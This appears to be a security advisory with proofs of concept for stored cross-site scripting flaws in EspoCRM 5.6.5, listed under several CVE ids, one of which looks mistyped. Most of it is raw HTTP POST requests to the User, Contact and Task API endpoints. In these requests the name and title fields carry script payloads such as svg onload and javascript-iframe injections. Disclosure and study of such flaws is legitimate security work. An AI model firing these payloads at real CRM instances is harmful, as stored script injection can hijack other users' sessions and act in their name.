EspoCRM 5.6.5 Stored XSS vulnerability


Affected Product: EspoCRM Version 5.6.5
Credits: Vulnerability discovered by Claudio Cinquino

CVE-2019-14329

Proof of Concept

Affected Component: Component Create User, parameters firstName and LastName

POST /espocrm/api/v1/User HTTP/1.1

Host: xx

User-Agent: xx

Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: xx/espocrm/

Content-Type: application/json

Authorization: Basic xx=

Espo-Authorization: xx

Espo-Authorization-By-Token: true

X-Requested-With: XMLHttpRequest

Content-Length: 604

Connection: close

Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx

{"type":"regular","firstName":";<svg/onload=alert("Clone")>","lastName":";<svg/onload=alert("Clone")>","isActive":true,"isSuperAdmin":false,"teams":{"teamsIds":[]},"gender":"","userName":"test","salutationName":"Mr.","title":";<svg/onload=alert("Clone")>","password":"xx","passwordConfirm":"xx","passwordPreview":"xx","emailAddressData":[],"emailAddress":null,"emailAddressIsOptedOut":null,"phoneNumberData":[],"phoneNumber":null,"phoneNumberIsOptedOut":null,"teamsIds":[],"teamsNames":{},"teamsColumns":{},"defaultTeamName":null,"defaultTeamId":null,"rolesIds":[],"rolesNames":{}} 

 

https://user-images.githubusercontent.com/53221919/61717355-32f71f80-ad61-11e9-9309-9b4385ff5887.PNG

 

CVE-2019-143230

Affected Component: Component Create Case, parameters firstName and LastName

POST /espocrm/api/v1/Contact HTTP/1.1

Host: xx

User-Agent: xx

Accept-Language: xx

Accept-Encoding: gzip, deflate

Referer: xxespocrm/

Content-Type: application/json

Authorization: Basic xx=

Espo-Authorization: xx=

Espo-Authorization-By-Token: true

X-Requested-With: XMLHttpRequest

Content-Length: 574

Connection: close

Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx4

 

{"firstName":"<input value=<><iframe/src=javascript:confirm(2)","lastName":"<input value=<><iframe/src=javascript:confirm(2)","assignedUserId":"1","assignedUserName":"t t","salutationName":"","accountsIds":[],"accountsNames":{},"accountsColumns":{},"title":null,"accountIsInactive":null,"emailAddressData":[],"emailAddress":null,"emailAddressIsOptedOut":null,"phoneNumberData":[],"phoneNumber":null,"phoneNumberIsOptedOut":null,"addressPostalCode":"","addressStreet":"","addressState":"","addressCity":"","addressCountry":"","description":null,"teamsIds":[],"teamsNames":{}}

Xss1

CVE-2019-14331

Affected Component: Component Create Task, parameters name

 

POST /espocrm/api/v1/Task HTTP/1.1

Host: xx

User-Agent: xx

Accept-Language: xx

Accept-Encoding: gzip, deflate

Referer: xx/espocrm/

Content-Type: application/json

Authorization: Basic x=

Espo-Authorization: x=

Espo-Authorization-By-Token: true

X-Requested-With: XMLHttpRequest

Content-Length: 457

Connection: close

Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx

 

{"parentId":"xx","parentType":"Contact","parentName":"<input value=<><iframe/src=javascript:confirm(2) <input value=<><iframe/src=javascript:confirm(2)","status":"Not Started","priority":"Normal","assignedUserId":"1","assignedUserName":"t t","name":"<input value=<><iframe/src=javascript:confirm(1)>","dateStartDate":null,"dateStart":null,"dateEndDate":null,"dateEnd":null,"description":null,"attachmentsIds":[],"teamsIds":[],"teamsNames":{}}

 

 

Xss2